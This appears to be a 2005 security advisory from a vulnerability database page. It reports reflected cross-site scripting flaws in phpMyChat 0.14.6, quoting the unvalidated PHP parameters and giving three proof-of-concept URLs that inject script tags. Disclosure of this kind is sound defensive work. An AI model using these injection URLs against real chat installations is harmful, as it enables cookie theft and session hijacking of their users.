phpMyChat Multiple XSS vulnerabilities.

Credit: Louis Wang
Risk: Low
Local: No
Remote: Yes

CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

phpMyChat Multiple XSS vulnerabilities. I. BACKGROUND phpMyChat is an easy-to-install, easy-to-use multi-room chat based on PHP and a database, supporting MySQL, PostgreSQL, and ODBC. II. DESCRIPTION phpMyChat 0.14.6 start_page.css.php, style.css.php, users_popupL.php are prone to Cross-site Scripting(XSS) vulnerability. A remote attacker could get cookie-based credential information with a specially-crafted URL or execute arbitrary web script or HTML. III. PUBLISH DATE 2005-12-2 IV. AUTHOR Louis Wang, Fortinet Security Research Team (FSRT)(secresearch at fortinet dot com.) V. AFFECTED SOFTWARE phpMyChat 0.14.6 is confirmed to be affected. Older versions are not verified. VI. ANALYSIS in start_page.css.php and style.css.php if (!isset($medium) || $medium == "") $medium = 10; $large = round(1.4 * $medium); $small = round(0.8 * $medium); Parameter $medium is not carefully validated. in users_popupL.php <A HREF="<?php echo("$From?Ver=L&L=$L"); ?>" TARGET="_blank"><?php echo(L_CHAT); ?></A> Parameter $From is not carefully validated. VII. Proof of Concept http://victimhost/phpmychat/chat/config/start_page.css.php?medium=><scri pt>alert(29837274289742472);</script>&FontName=1 http://victimhost/phpmychat/chat/config/style.css.php?medium=><script>al ert(29837274289742472);</script>&FontName=1 http://victimhost/phpmychat/chat/users_popupL.php?From="><script>alert(2 9837274289742472);</script>>&L=english&LastCheck=1133281246&B=0 VIII. SOLUTION Input validation will fix the vulnerability. IX. ADVISORY X. REFERENCE

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top